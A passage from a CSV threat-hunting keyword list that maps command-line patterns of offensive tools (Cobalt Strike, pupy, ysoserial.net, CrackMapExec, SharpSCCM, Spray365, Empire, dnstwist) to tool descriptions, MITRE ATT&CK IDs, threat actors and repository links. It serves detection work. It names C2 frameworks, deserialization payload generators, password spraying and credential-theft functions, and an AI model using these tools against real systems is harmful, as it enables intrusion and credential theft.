TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers bitsquatting*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers cyrillic*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers dictionary*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers homoglyph*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers hyphenation*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers insertion*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers omission*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers repetition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers replacement*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers subdomain*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers transposition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers vowel-swap*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -g PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"* gcat.py -*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* generate audit -ep *--passwords_in_userfile*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate normal -ep * -d * -u * -pf *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate normal -ep ex-plan.s365 *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"* generatePayload*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* get class-instances SMS_R_System *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get class-properties SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get collection-members -n USERS*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get primary-users -u *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get site-push-settings*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_rooot *","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* GetAppLockerPolicies*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"* GetLsassPid*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"* getprivs.c *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* getprivs.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"* --get-syscallstub *","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* github repos list --org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 